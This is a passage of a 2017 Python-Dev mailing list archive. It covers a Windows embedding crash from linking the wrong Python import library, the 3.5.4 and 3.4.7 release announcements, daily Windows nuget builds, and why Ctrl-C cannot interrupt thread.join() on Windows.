interpreter. > > > > I have no problem with patches enabling an LTO only build for anyone > who wants one if they do not already exist. At the moment I'm not > sure which LTO toolchains actually work properly. We removed it from > inclusion in --enable-optimizations because it was clearly broken in > some common environments. > > > > If LTO without PGO is useful, making it work is probably just a matter > of making sure @LTOFLAGS@ show up on the non-PGO related > Makefile.pre.in targets as well as updating the help text for --with-lto in configure.ac. > [untested] > > > > -gps > > > > > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gm > ail.com > _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/peter.xihong.wang%40intel.com _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/greg%40krypto.org -------------- next part -------------- An HTML attachment was scrubbed... URL: From larry at hastings.org Mon Aug 7 20:44:48 2017 From: larry at hastings.org (Larry Hastings) Date: Mon, 7 Aug 2017 17:44:48 -0700 Subject: [Python-Dev] PyThreadState_GET() returns NULL from within PyImport_GetModuleDict() In-Reply-To: References: Message-ID: <2b758940-ce06-f357-88f2-5ec1fb15dd55@hastings.org> On 08/07/2017 05:11 PM, Patrick Rutkowski wrote: > Does anyone have any ideas here? My one idea: the GIL isn't initialized until you create a new thread. //arry/ -------------- next part -------------- An HTML attachment was scrubbed... 
URL:

From patrick.rutkowski at gmail.com  Mon Aug  7 21:21:41 2017
From: patrick.rutkowski at gmail.com (Patrick Rutkowski)
Date: Mon, 7 Aug 2017 21:21:41 -0400
Subject: [Python-Dev] PyThreadState_GET() returns NULL from within
 PyImport_GetModuleDict()
In-Reply-To: <2b758940-ce06-f357-88f2-5ec1fb15dd55@hastings.org>
References: <2b758940-ce06-f357-88f2-5ec1fb15dd55@hastings.org>
Message-ID:

On Mon, Aug 7, 2017 at 8:44 PM, Larry Hastings wrote:
>
> My one idea: the GIL isn't initialized until you create a new thread.
>

That didn't seem to be it. I put a CreateThread() call right after
Py_Initialize(), and that didn't fix it. I also moved it around to before
Py_Initialize() and various other places, and nothing helped.

From patrick.rutkowski at gmail.com  Tue Aug  8 01:31:46 2017
From: patrick.rutkowski at gmail.com (Patrick Rutkowski)
Date: Tue, 8 Aug 2017 01:31:46 -0400
Subject: [Python-Dev] PyThreadState_GET() returns NULL from within
 PyImport_GetModuleDict()
In-Reply-To:
References:
Message-ID:

After much stumbling around in the dark I have the answer. The following
table shows the results of tests which I performed pairing different
build configurations of my WinMain() app with different python libraries.
The terms "Release" and "Debug" refer to the configuration type in Visual
Studio. All builds were done in x64 mode.

Debug   | python36.lib   | Works
Debug   | python36_d.lib | Works
Debug   | python3_d.lib  | Works
Debug   | python3.lib    | !!! CRASHES !!!

Release | python36.lib   | Works
Release | python36_d.lib | Works
Release | python3_d.lib  | !!! CRASHES !!!
Release | python3.lib    | Works

So, it seems to be the case that picking a mismatched python binary
causes the crash, __but only with python3, not with python36__. This
makes me wonder what the difference is between the two in the first
place. I was getting the crash to begin with because I was linking my
Debug build with the release build python3.lib, since I thought it
shouldn't matter.

My problem is fixed now, but if anyone could shed light on the details of
why exactly it happened then I would certainly be interested.

On Mon, Aug 7, 2017 at 8:11 PM, Patrick Rutkowski wrote:
> I'm working on Windows. I have the following dead simple embedding
> code that I'm using to test out the python interpreter:
>
> ============================================================
>
> Py_SetProgramName(L"MyApp");
>
> Py_SetPath(
>     L"C:\\Users\\rutski\\Documents\\python\\PCBuild\\amd64\\python36.zip;"
>     L"C:\\Users\\rutski\\Documents\\python\\DLLs;"
>     L"C:\\Users\\rutski\\Documents\\python\\lib;"
>     L"C:\\Users\\rutski\\Documents\\python\\PCBuild\\amd64;"
>     L"C:\\Users\\rutski\\Documents\\python;"
>     L"C:\\Users\\rutski\\Documents\\python\\lib\\site-packages");
>
> Py_Initialize();
>
> PyRun_SimpleString(
>     "from time import time,ctime\n"
>     "print('Today is', ctime(time()))\n");
>
> ============================================================
>
> This code crashes trying to access address 0x00000010 from within
> PyRun_SimpleString(). The sequence of events is this:
>
> 1) PyRun_SimpleString() tries to do AddModule("__main__")
> 2) AddModule tries to do PyImport_GetModuleDict()
> 3) PyImport_GetModuleDict() tries to do PyThreadState_GET()->interp
> 4) PyThreadState_GET() returns NULL, so the ->interp part crashes.
>
> The weird thing is that calling PyImport_GetModuleDict() from within
> my application directly works just fine. Weirder still is that the
> whole thing actually executes fine if I build a windows command line
> application with the embed code in main(), and execute it from a
> terminal. The crash only happens when building a Windows GUI
> application and calling the embed code in WinMain().
>
> This is a python interpreter that I built from source on windows using
> PCbuild\build.bat, so that I could track the crash. However, the exact
> same crash was happening with the stock interpreter provided by the
> python windows installer.
>
> Does anyone have any ideas here?
> -Patrick
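For background on why the .lib choice matters at all: when you simply
include Python.h under MSVC, the import library is normally chosen
automatically by PC/pyconfig.h. The selection block is paraphrased below
as a sketch, from memory, so check the header itself for the
authoritative version:

/* Paraphrase of the library-selection block in PC/pyconfig.h (sketch). */
#if defined(_DEBUG)
#  pragma comment(lib, "python36_d.lib")  /* debug-CRT build */
#elif defined(Py_LIMITED_API)
#  pragma comment(lib, "python3.lib")     /* stable-ABI forwarding DLL */
#else
#  pragma comment(lib, "python36.lib")    /* binds directly to python36.dll */
#endif

Hand-picking a .lib on the linker command line, as in the table above,
bypasses that logic, which is how the debug/release and python3/python36
combinations got crossed.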
From larry at hastings.org  Tue Aug  8 06:58:55 2017
From: larry at hastings.org (Larry Hastings)
Date: Tue, 8 Aug 2017 03:58:55 -0700
Subject: [Python-Dev] [RELEASED] Python 3.5.4 is now available
Message-ID: <86871e7f-2117-f05f-7c55-c3a7ddab920d@hastings.org>

On behalf of the Python development community and the Python 3.5 release
team, I'm pleased to announce the availability of Python 3.5.4.

Python 3.5.4 is the final 3.5 release in "bug fix" mode. The Python 3.5
branch has now transitioned into "security fixes mode"; all future
improvements in the 3.5 branch will be security fixes only, and no
conventional bug fixes will be merged.

You can find Python 3.5.4 here:

https://www.python.org/downloads/release/python-354/

Python 3.4.7 final will be released later today.

Happy Pythoning,

//arry/
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From larry at hastings.org  Tue Aug  8 07:22:30 2017
From: larry at hastings.org (Larry Hastings)
Date: Tue, 8 Aug 2017 04:22:30 -0700
Subject: [Python-Dev] Python 3.5 has now transitioned to "security fixes
 only" mode
Message-ID: <6bf6b31d-0afd-a1bb-a5ae-ae0650fb842c@hastings.org>

The Python 3.5 branch has now entered "security fixes only" mode. No more
bugfixes will be accepted into the 3.5 branch.

In keeping with our modern workflow, I have changed the permissions on
the 3.5 branch on Github so that only release managers can accept PRs
into the branch. Please add me to your 3.5 security fix PRs, as I'm the
one responsible for accepting them. (This was already true for the 3.4
branch, too.)

I neglected to mention it in the release announcement, but this
transition also means no more binary installers for 3.5 releases. This
signals the end of my interactions with macOS Platform Expert Ned Deily
and Windows Platform Expert Steve Dower when making releases. I just
wanted to mention what a pleasure it has been working with those two
gentlemen for the two Python releases I've RM'd for. They've made me look
good every time.

Cheers,

//arry/
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From jonathan at slenders.be  Tue Aug  8 05:54:28 2017
From: jonathan at slenders.be (Jonathan Slenders)
Date: Tue, 8 Aug 2017 11:54:28 +0200
Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C /
 KeyboardInterrupt on Windows
Message-ID:

Hi all,

Is it possible that thread.join() cannot be interrupted on Windows, while
it can be on Linux? Would this be a bug, or is it by design?

import threading, time

def wait():
    time.sleep(1000)

t = threading.Thread(target=wait)
t.start()
t.join()  # Press Control-C now. It stops on Linux, while it hangs
          # on Windows.

Tested on Python 3.6.

Thanks,
Jonathan
-------------- next part --------------
An HTML attachment was scrubbed...
URL: From steve.dower at python.org Tue Aug 8 11:39:12 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 8 Aug 2017 08:39:12 -0700 Subject: [Python-Dev] PyThreadState_GET() returns NULL from within PyImport_GetModuleDict() In-Reply-To: References: Message-ID: On 07Aug2017 2231, Patrick Rutkowski wrote: > So, it seems to be the case that picking a mismatched python binary > causes the crash, __but only with python3, not with python36__. This > makes me wonder what the differences is between the two in the first > place. I was getting the crash to begin with because I was linking my > Debug build with the release build python3.lib, since I thought it > shouldn't matter. > > My problem is fixed now, but if anyone could sheld light on the > details of why exactly it happened then I would certainy be > interested. I'd love to be able to, but honestly I have basically no idea. There is only one implementation of PyThreadState_Get() (which is what the PyThreadState_GET macro should map to), and that should never return NULL without terminating the entire process. My best guess is that the API forwarding being done by python3.dll is failing somehow and is turning into a function that returns 0. Since you are embedding rather than building an extension module, I'd suggest linking directly to python36[_d].dll, since you will presumably be including the Python runtime with your application (this is exactly the use case for the embeddable package, in case you hadn't seen that). The python3[_d].dll is most useful when building a .pyd that may be used with multiple versions of Python 3. It has some limitations and many bugs though, which I don't know we can ever fully resolve, but all of which can be avoided in your case by not using it :) Hope that helps, Steve From steve.dower at python.org Tue Aug 8 12:21:51 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 8 Aug 2017 09:21:51 -0700 Subject: [Python-Dev] [ANN] Daily Windows builds of Python 3.x Message-ID: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> Hi all As part of a deal with Zach Ware at PyCon, I agreed that if he removed the Subversion dependency from our builds, I would set up daily Windows builds of Python. Zach did an excellent job, and so I am now following through on my half of the deal :) For a while I've been uploading the official releases to nuget.org. These packages can be installed with nuget.exe (latest version always available at https://aka.ms/nugetclidl), which is quickly becoming a standard tool in Microsoft's build toolsets. It's very much a CI-focused package manager, rather than a user-focused one, and CI on Windows was previously an area where it was difficult to use Python. See the official feed at https://www.nuget.org/packages/python, and related packages pythonx86, python2 and python2x86. For people looking for an official "no installer" version of Python for Windows, this is it. And since all the infrastructure was there already, I decided to publish daily builds in a similar way to myget.org: https://www.myget.org/feed/python/package/nuget/pythondaily To install the latest daily build, run nuget.exe with this command: nuget.exe pythondaily -Source https://www.myget.org/F/python/api/v3/index.json (Note that if you already have a "pythondaily" package in that directory, nuget will consider the requirement satisfied. 
As I said, it's meant for reproducible CI builds rather than users who want to update things in the least amount of keystrokes :) ) The sys.version string contains the short commit hash. Please include this string when reporting bugs in these builds. Also, only the amd64 Release build is available pre-built. >>> sys.version '3.7.0a0 (remotes/origin/master:733d0f63c, Aug 8 2017, 15:56:14) [MSC v.1900 64 bit (AMD64)]' Hopefully this is valuable for people who want to include daily builds in their own test runs or validate recent bug fixes. Cheers, Steve From victor.stinner at gmail.com Tue Aug 8 12:38:17 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Tue, 8 Aug 2017 18:38:17 +0200 Subject: [Python-Dev] [ANN] Daily Windows builds of Python 3.x In-Reply-To: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> References: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> Message-ID: Thank you! I recall that we discussed that, but I understood that you was too busy to implement the idea. No, you didn't forget and you made it! ;-) Victor 2017-08-08 18:21 GMT+02:00 Steve Dower : > Hi all > > As part of a deal with Zach Ware at PyCon, I agreed that if he removed the > Subversion dependency from our builds, I would set up daily Windows builds > of Python. Zach did an excellent job, and so I am now following through on > my half of the deal :) > > For a while I've been uploading the official releases to nuget.org. These > packages can be installed with nuget.exe (latest version always available at > https://aka.ms/nugetclidl), which is quickly becoming a standard tool in > Microsoft's build toolsets. It's very much a CI-focused package manager, > rather than a user-focused one, and CI on Windows was previously an area > where it was difficult to use Python. > > See the official feed at https://www.nuget.org/packages/python, and related > packages pythonx86, python2 and python2x86. > > For people looking for an official "no installer" version of Python for > Windows, this is it. > > > And since all the infrastructure was there already, I decided to publish > daily builds in a similar way to myget.org: > > https://www.myget.org/feed/python/package/nuget/pythondaily > > To install the latest daily build, run nuget.exe with this command: > > nuget.exe pythondaily -Source > https://www.myget.org/F/python/api/v3/index.json > > (Note that if you already have a "pythondaily" package in that directory, > nuget will consider the requirement satisfied. As I said, it's meant for > reproducible CI builds rather than users who want to update things in the > least amount of keystrokes :) ) > > The sys.version string contains the short commit hash. Please include this > string when reporting bugs in these builds. Also, only the amd64 Release > build is available pre-built. > > >>> sys.version > '3.7.0a0 (remotes/origin/master:733d0f63c, Aug 8 2017, 15:56:14) [MSC > v.1900 64 bit (AMD64)]' > > Hopefully this is valuable for people who want to include daily builds in > their own test runs or validate recent bug fixes. 
> > Cheers, > Steve > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gmail.com From p.f.moore at gmail.com Tue Aug 8 13:59:34 2017 From: p.f.moore at gmail.com (Paul Moore) Date: Tue, 8 Aug 2017 18:59:34 +0100 Subject: [Python-Dev] [ANN] Daily Windows builds of Python 3.x In-Reply-To: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> References: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> Message-ID: On 8 August 2017 at 17:21, Steve Dower wrote: > For a while I've been uploading the official releases to nuget.org. These > packages can be installed with nuget.exe (latest version always available at > https://aka.ms/nugetclidl), which is quickly becoming a standard tool in > Microsoft's build toolsets. It's very much a CI-focused package manager, > rather than a user-focused one, and CI on Windows was previously an area > where it was difficult to use Python. > > See the official feed at https://www.nuget.org/packages/python, and related > packages pythonx86, python2 and python2x86. > > For people looking for an official "no installer" version of Python for > Windows, this is it. I've been aware of these builds for a while, but wasn't 100% sure of the status of them. It would be really useful if they could be publicised more widely - if for no other reason than to steer people towards these rather than the embedded distribution when these are more appropriate. But regardless of that minor point, the availability of these builds is really nice. > And since all the infrastructure was there already, I decided to publish > daily builds in a similar way to myget.org: > > https://www.myget.org/feed/python/package/nuget/pythondaily > > To install the latest daily build, run nuget.exe with this command: > > nuget.exe pythondaily -Source > https://www.myget.org/F/python/api/v3/index.json > > (Note that if you already have a "pythondaily" package in that directory, > nuget will consider the requirement satisfied. As I said, it's meant for > reproducible CI builds rather than users who want to update things in the > least amount of keystrokes :) ) > > The sys.version string contains the short commit hash. Please include this > string when reporting bugs in these builds. Also, only the amd64 Release > build is available pre-built. > > >>> sys.version > '3.7.0a0 (remotes/origin/master:733d0f63c, Aug 8 2017, 15:56:14) [MSC > v.1900 64 bit (AMD64)]' > > Hopefully this is valuable for people who want to include daily builds in > their own test runs or validate recent bug fixes. Nice! I can imagine these being a really useful resource for people wanting to (say) test against the development version in their Appveyor builds. Thanks for putting the effort into producing these :-) Paul From njs at pobox.com Tue Aug 8 14:51:45 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 8 Aug 2017 11:51:45 -0700 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows In-Reply-To: References: Message-ID: On Tue, Aug 8, 2017 at 2:54 AM, Jonathan Slenders wrote: > Hi all, > > Is it possible that thread.join() cannot be interrupted on Windows, while it > can be on Linux? > Would this be a bug, or is it by design? > > > import threading, time > def wait(): > time.sleep(1000) > t = threading.Thread(target=wait) > t.start() > t.join() # Press Control-C now. 
It stops on Linux, while it hangs on
> Windows.

This comes down to a difference in how the Linux and Windows low-level
APIs handle control-C and blocking functions: on Linux, the default is
that any low-level blocking function can be interrupted by a control-C or
any other random signal, and it's the calling code's job to check for
this and restart it if necessary. This is annoying because it means that
every low-level function call inside the Python interpreter has to have a
bunch of boilerplate to detect this and retry, but OTOH it means that
control-C automatically works in (almost) all cases. On Windows, they
made the opposite decision: low-level blocking functions are never
automatically interrupted by control-C. It's a reasonable design choice.
The advantage is that sloppily written programs tend to work better -- on
Linux you kind of *have* to put a retry loop around *every* low level
call or your program will suffer weird random bugs, and on Windows you
don't.

But for carefully written programs like CPython this is actually pretty
annoying, because if you *do* want to wake up on a control-C, then on
Windows that has to be laboriously implemented on a case-by-case basis
for each blocking function, and often this requires some kind of
cleverness or is actually impossible, depending on what function you want
to interrupt. At least on Linux the retry loop is always the same.

The end result is that on Windows, control-C almost never works to wake
up a blocked Python process, with a few special exceptions where someone
did the work to implement this. On Python 2 the only functions that have
this implemented are time.sleep() and multiprocessing.Semaphore.acquire;
on Python 3 there are a few more (you can grep the source for
_PyOS_SigintEvent to find them), but Thread.join isn't one of them.

It looks like Thread.join ultimately ends up blocking in
Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs
behind it -- I think there are 3 different implementations you might end
up with, depending on how CPython was built? Two of them seem to
ultimately block in WaitForSingleObject, which would be easy to adapt to
handle control-C. Unfortunately I think the implementation that actually
gets used on modern systems is the one that blocks in
SleepConditionVariableSRW, and I don't see any easy way for a control-C
to interrupt that. But maybe I'm missing something -- I'm not a Windows
expert.

-n

--
Nathaniel J. Smith -- https://vorpus.org
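To make the contrast concrete, here is a minimal sketch of the two
patterns (illustrative only: _PyOS_SigintEvent() is the real CPython
helper mentioned above, but the wrapper functions and their arguments are
invented for this example; CPython's actual wait loops live in
Python/thread_nt.h and the other places that grep finds):

#include <Python.h>       /* declares _PyOS_SigintEvent() on Windows */

#ifdef MS_WINDOWS
#include <windows.h>
/* Windows pattern: the wait must explicitly include the event that
 * CPython's console-control handler sets on Ctrl-C, or it never wakes.
 * Returns 1 if interrupted by Ctrl-C, 0 once `lock` is acquired. */
static int
wait_lock_interruptible(HANDLE lock)
{
    HANDLE handles[2] = { lock, _PyOS_SigintEvent() };
    DWORD rc = WaitForMultipleObjects(2, handles, FALSE, INFINITE);
    return rc == WAIT_OBJECT_0 + 1;   /* index 1 is the Ctrl-C event */
}
#else
#include <errno.h>
#include <unistd.h>
/* POSIX pattern: any blocking call may fail with EINTR when a signal
 * arrives; the caller retries, giving Python a chance to run its signal
 * handlers (where KeyboardInterrupt gets raised) in between. */
static ssize_t
read_retrying(int fd, void *buf, size_t len)
{
    ssize_t n;
    do {
        n = read(fd, buf, len);
    } while (n < 0 && errno == EINTR);
    return n;
}
#endif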
> > This comes down to a difference in how the Linux and Windows low-level > APIs handle control-C and blocking functions: on Linux, the default is > that any low-level blocking function can be interrupted by a control-C > or any other random signal, and it's the calling code's job to check > for this and restart it if necessary. This is annoying because it > means that every low-level function call inside the Python interpreter > has to have a bunch of boilerplate to detect this and retry, but OTOH > it means that control-C automatically works in (almost) all cases. On > Windows, they made the opposite decision: low-level blocking functions > are never automatically interrupted by control-C. It's a reasonable > design choice. The advantage is that sloppily written programs tend to > work better -- on Linux you kind of *have* to put a retry loop around > *every* low level call or your program will suffer weird random bugs, > and on Windows you don't. > > But for carefully written programs like CPython this is actually > pretty annoying, because if you *do* want to wake up on a control-C, > then on Windows that has to be laboriously implemented on a > case-by-case basis for each blocking function, and often this requires > some kind of cleverness or is actually impossible, depending on what > function you want to interrupt. At least on Linux the retry loop is > always the same. > > The end result is that on Windows, control-C almost never works to > wake up a blocked Python process, with a few special exceptions where > someone did the work to implement this. On Python 2 the only functions > that have this implemented are time.sleep() and > multiprocessing.Semaphore.acquire; on Python 3 there are a few more > (you can grep the source for _PyOS_SigintEvent to find them), but > Thread.join isn't one of them. > > It looks like Thread.join ultimately ends up blocking in > Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs > behind it -- I think there are 3 different implementation you might > end up with, depending on how CPython was built? Two of them seem to > ultimately block in WaitForSingleObject, which would be easy to adapt > to handle control-C. Unfortunately I think the implementation that > actually gets used on modern systems is the one that blocks in > SleepConditionVariableSRW, and I don't see any easy way for a > control-C to interrupt that. But maybe I'm missing something -- I'm > not a Windows expert. > > -n > > -- > Nathaniel J. Smith -- https://vorpus.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From steve.dower at python.org Tue Aug 8 17:29:41 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 8 Aug 2017 14:29:41 -0700 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows In-Reply-To: References: Message-ID: On 08Aug2017 1151, Nathaniel Smith wrote: > It looks like Thread.join ultimately ends up blocking in > Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs > behind it -- I think there are 3 different implementation you might > end up with, depending on how CPython was built? Two of them seem to > ultimately block in WaitForSingleObject, which would be easy to adapt > to handle control-C. Unfortunately I think the implementation that > actually gets used on modern systems is the one that blocks in > SleepConditionVariableSRW, and I don't see any easy way for a > control-C to interrupt that. 
But maybe I'm missing something -- I'm > not a Windows expert. I'd have to dig back through the recent attempts at changing this, but I believe the SleepConditionVariableSRW path is unused for all versions of Windows. A couple of people (including myself) attempted to enable that code path, but it has some subtle issues that were causing test failures, so we abandoned all the attempts. Though ISTR that someone put in more effort than most of us, but I don't think we've merged it (and if we have, it'd only be in 3.7 at this stage). Cheers, Steve From njs at pobox.com Tue Aug 8 18:12:02 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 8 Aug 2017 15:12:02 -0700 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows In-Reply-To: References: Message-ID: On Tue, Aug 8, 2017 at 2:29 PM, Steve Dower wrote: > On 08Aug2017 1151, Nathaniel Smith wrote: >> >> It looks like Thread.join ultimately ends up blocking in >> Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs >> behind it -- I think there are 3 different implementation you might >> end up with, depending on how CPython was built? Two of them seem to >> ultimately block in WaitForSingleObject, which would be easy to adapt >> to handle control-C. Unfortunately I think the implementation that >> actually gets used on modern systems is the one that blocks in >> SleepConditionVariableSRW, and I don't see any easy way for a >> control-C to interrupt that. But maybe I'm missing something -- I'm >> not a Windows expert. > > > I'd have to dig back through the recent attempts at changing this, but I > believe the SleepConditionVariableSRW path is unused for all versions of > Windows. > > A couple of people (including myself) attempted to enable that code path, > but it has some subtle issues that were causing test failures, so we > abandoned all the attempts. Though ISTR that someone put in more effort than > most of us, but I don't think we've merged it (and if we have, it'd only be > in 3.7 at this stage). Ah, you're right -- the comments say it's used on Windows 7 and later, but the code disagrees. Silly me for trusting the comments :-). So it looks like it would actually be fairly straightforward to add control-C interruption support. -n -- Nathaniel J. Smith -- https://vorpus.org From victor.stinner at gmail.com Tue Aug 8 18:29:24 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Wed, 9 Aug 2017 00:29:24 +0200 Subject: [Python-Dev] [RELEASED] Python 3.5.4 is now available In-Reply-To: <86871e7f-2117-f05f-7c55-c3a7ddab920d@hastings.org> References: <86871e7f-2117-f05f-7c55-c3a7ddab920d@hastings.org> Message-ID: I updated some websites and services for the 3.5.4 release: * Status of Python branches in the devguide: https://devguide.python.org/#status-of-python-branches * Python security vulnerabilities: http://python-security.readthedocs.io/vulnerabilities.html * I removed all Python 3.5 buildbots: https://github.com/python/buildmaster-config/pull/17 Zachary Ware told me that 3.5.4 now comes before 3.6.2 on https://www.python.org/downloads/ but I don't think that it's a real issue :-) *Maybe* we could group releases per Python branch? Or sort by Python branches. Victor 2017-08-08 12:58 GMT+02:00 Larry Hastings : > > On behalf of the Python development community and the Python 3.5 release > team, I'm pleased to announce the availability of Python 3.5.4. > > Python 3.5.4 is the final 3.5 release in "bug fix" mode. 
The Python 3.5 > branch has now transitioned into "security fixes mode"; all future > improvements in the 3.5 branch will be security fixes only, and no > conventional bug fixes will be merged. > > > You can find Python 3.5.4 here: > > https://www.python.org/downloads/release/python-354/ > > > Python 3.4.7 final will be released later today. > > > Happy Pythoning, > > > /arry > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gmail.com > From steve.dower at python.org Tue Aug 8 20:18:46 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 8 Aug 2017 17:18:46 -0700 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows In-Reply-To: References: Message-ID: On 08Aug2017 1512, Nathaniel Smith wrote: > On Tue, Aug 8, 2017 at 2:29 PM, Steve Dower wrote: >> On 08Aug2017 1151, Nathaniel Smith wrote: >>> >>> It looks like Thread.join ultimately ends up blocking in >>> Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs >>> behind it -- I think there are 3 different implementation you might >>> end up with, depending on how CPython was built? Two of them seem to >>> ultimately block in WaitForSingleObject, which would be easy to adapt >>> to handle control-C. Unfortunately I think the implementation that >>> actually gets used on modern systems is the one that blocks in >>> SleepConditionVariableSRW, and I don't see any easy way for a >>> control-C to interrupt that. But maybe I'm missing something -- I'm >>> not a Windows expert. >> >> >> I'd have to dig back through the recent attempts at changing this, but I >> believe the SleepConditionVariableSRW path is unused for all versions of >> Windows. >> >> A couple of people (including myself) attempted to enable that code path, >> but it has some subtle issues that were causing test failures, so we >> abandoned all the attempts. Though ISTR that someone put in more effort than >> most of us, but I don't think we've merged it (and if we have, it'd only be >> in 3.7 at this stage). > > Ah, you're right -- the comments say it's used on Windows 7 and later, > but the code disagrees. Silly me for trusting the comments :-). So it > looks like it would actually be fairly straightforward to add > control-C interruption support. Except we're still hypothesising that the native condition variables will be faster than our emulation. I think until we prove or disprove that with a correct implementation, I'd rather not make a promise that Ctrl+C will work in situations where we depend on it. That's not to say that it isn't possible to continue fixing Ctrl+C handling in targeted locations. But I don't want to guarantee that an exception case like that will always work given there's a chance it may prevent us getting a performance benefit in the normal case. (I'm trying to advise caution, rather than saying it'll never happen.) 
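For reference, a pure-Python workaround already exists today: avoid the indefinite blocking wait entirely. Calling join() with a timeout in a loop returns control to the interpreter between waits, so a pending KeyboardInterrupt gets raised within the timeout granularity, even on Windows. A minimal sketch (the half-second interval is an arbitrary choice):

import threading, time

def wait():
    time.sleep(1000)

t = threading.Thread(target=wait, daemon=True)
t.start()

# join() with a timeout wakes up periodically instead of blocking
# forever, giving the main thread a chance to deliver Ctrl-C between
# attempts; daemon=True lets the process exit without the worker.
while t.is_alive():
    t.join(0.5)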
Cheers, Steve From ncoghlan at gmail.com Tue Aug 8 23:36:28 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 9 Aug 2017 13:36:28 +1000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Message-ID: On 8 August 2017 at 10:12, Gregory P. Smith wrote: > I don't know whether it is beneficial or not - but having the capability to > build LTO without PGO seems reasonable. I can review any pull requests > altering configure.ac and Makefile.pre.in to make such a change. Being able to separate them seems useful even if it's just from the performance research perspective of comparing "PGO only", "LTO only" and "PGO+LTO". The LTO only numbers may be of questionable relevance to us as CPython developers, but I can definitely see them being of interest to the folks working on C compiler toolchains. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Tue Aug 8 23:50:55 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 9 Aug 2017 13:50:55 +1000 Subject: [Python-Dev] [ANN] Daily Windows builds of Python 3.x In-Reply-To: References: <2e89743a-4a08-d1df-1fb7-a3c08bd35187@python.org> Message-ID: On 9 August 2017 at 03:59, Paul Moore wrote: > On 8 August 2017 at 17:21, Steve Dower wrote: >> For a while I've been uploading the official releases to nuget.org. These >> packages can be installed with nuget.exe (latest version always available at >> https://aka.ms/nugetclidl), which is quickly becoming a standard tool in >> Microsoft's build toolsets. It's very much a CI-focused package manager, >> rather than a user-focused one, and CI on Windows was previously an area >> where it was difficult to use Python. >> >> See the official feed at https://www.nuget.org/packages/python, and related >> packages pythonx86, python2 and python2x86. >> >> For people looking for an official "no installer" version of Python for >> Windows, this is it. > > I've been aware of these builds for a while, but wasn't 100% sure of > the status of them. It would be really useful if they could be > publicised more widely - if for no other reason than to steer people > towards these rather than the embedded distribution when these are > more appropriate. The trade-offs between the various options for managing Python runtimes on Windows would likely make sense as a packaging.python.org discussion: https://packaging.python.org/discussions/ The woefully incomplete discussion on application deployment (https://packaging.python.org/discussions/deploying-python-applications/) could then be updated to reference that rather than having to cover it inline. Cheers, Nick. P.S. 
Thanks to https://github.com/pypa/python-packaging-user-guide/issues/317, we have 3 clearly distinct categories of docs in PyPUG these days: tutorials, where we deliberately only present one option to avoid overwhelming readers with too much information, guides, where we're still opinionated, but acknowledge alternatives, and discussions, where the overall tone is "the right option depends on your goals" -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From larry at hastings.org Wed Aug 9 03:31:12 2017 From: larry at hastings.org (Larry Hastings) Date: Wed, 9 Aug 2017 00:31:12 -0700 Subject: [Python-Dev] [RELEASED] Python 3.4.7 is now available Message-ID: <513e80d5-170f-21f8-1429-de86a6752169@hastings.org> On behalf of the Python development community and the Python 3.4 release team, I'm pleased to announce the availability of Python 3.4.7. Python 3.4 is now in "security fixes only" mode. This is the final stage of support for Python 3.4. Python 3.4 now only receives security fixes, not bug fixes, and Python 3.4 releases are source code only--no more official binary installers will be produced. You can find Python 3.4.7 here: https://www.python.org/downloads/release/python-347/ Happy Pythoning, //arry/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From solipsis at pitrou.net Wed Aug 9 03:52:52 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 9 Aug 2017 